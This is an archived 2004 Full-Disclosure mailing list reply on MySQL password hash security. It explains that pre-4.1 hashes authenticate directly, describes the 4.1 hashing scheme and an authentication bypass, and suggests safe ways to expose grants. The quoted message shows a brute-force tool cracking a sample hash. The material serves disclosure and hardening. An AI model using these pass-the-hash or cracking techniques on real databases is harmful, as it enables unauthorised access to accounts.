Re: [Full-Disclosure] mysql password cracking

From: Chris Anley (chris_at_ngssoftware.com)
Date: 10/11/04

  • Next message: Vincent Archer: "Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal."
    To: full-disclosure@lists.netsys.com
    Date: Mon, 11 Oct 2004 09:15:01 +0100
    
    

    Hey David,

    Re: allowing users to see other user's hashes - it's dangerous; don't do
    it if you don't have to.

    To precis what's in the paper (which I wrote btw), there's a few
    interesting points about mysql password hashes:

    1) In versions prior to 4.1, the password hash can be used to
    authenticate directly with the database, so you don't need to crack it.
    In other words, knowledge of the *hash* is what the authentication
    protocol tests, not knowledge of the password. Admittedly you'd need to
    modify your mysql client to authenticate this way but that's not too hard.

    2) In versions 4.1 or better (which are still Beta) MySQL uses SHA1 to
    hash the passwords, so the situation is a little better. You can still
    crack sha1 password hashes fairly easily though, depending on the
    password complexity and length. The hashing algorithm is to sha1 hash
    the password, then sha1 hash the resulting hash, in other words
    sha1(sha1(password)). Of course, if you're using 4.1 or better you're
    using beta software, against MySQL AB's recommendation.

    3) If you use 4.1 ensure it's at least 4.1.3, because of the
    authentication bug detailed in the paper which (briefly) lets any user
    authenticate without needing to know the password.

    If for some reason you have to have an untrusted user viewing another
    user's grants, you could do it safely a number of ways (assuming version
    4.0.x):

    a) Write a UDF to do it (probably the best solution)
    b) Write a batch script that periodically does the 'show grants', strips
    the password hashes out and then inserts the data into a table your user
    can see. Of course, the data won't be current, but that might be ok and
    you don't need to mess about with dangerous privs.
    c) Grant the user select privilege (only) on mysql.db, mysql.host,
    tables_priv, user_priv and every column of 'mysql.user' apart from
    'password', and 'select' their privs out manually. This may be
    dangerous, so be careful.

    Hope that helps... :o)

          -chris.

    Willem Koenings wrote:
    > hi,
    >
    >
    >>I'm wondering how dangerous it is to allow a user on a
    >>mysql db to view the grants for another user. Could
    >>they take the encrypted password data and possibly
    >>crack it? If they can, how easy is it?
    >
    >
    > on certain condition it's quite easy, if you have
    > a hash:
    >
    > test.exe 57510426775c5b0f
    > Hash: 57510426775c5b0f
    > Trying length 3
    > Trying length 4
    > Trying length 5
    > Found pass: guest
    >
    >
    > some reading for you:
    >
    > http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
    >
    > all the best,
    >
    > W.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Vincent Archer: "Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal."

    Relevant Pages

    • Re: People ~Fing with Life
      ... That is what the charge was. ... hash values and the like'. ... this data area had no corresponding entry in the allocation tables. ... Hashes are used for the purposes of error correction ...
      (uk.legal)
    • Re: Passwords: to crypt or to hash?
      ... read recently that hashes are stored rather than crypted versions. ... Very few systems have ever stored crypted passwords. ... the hash function took over a second to compute. ...
      (comp.security.misc)
    • RE: [7.8.2002 44916] Notice of Copyright Infringement]
      ... Appending a single bit onto the end of the file makes a different hash. ... and you no longer match the hashes. ... The only way to prove you're breaking copyright is to download at ... |"real" warezed version of whatever movie. ...
      (Vuln-Dev)
    • Re: ACCEPT and the SCREEN SECTION.
      ... General-purpose hashes, for hash tables and similar data structures, ... In short, cryptographic hashes like MD5 are used to verify data, ... if a client asks for and receives a chunk ...
      (comp.lang.cobol)
    • Re: what is probability to create two equal hashes for md5 algorithm
      ... Other than that, if the hash is statistically good, the longer the hash, the ... few cases the hashes match. ... md5 and crc32)? ... How much does it cost to compare two hashes? ...
      (sci.crypt)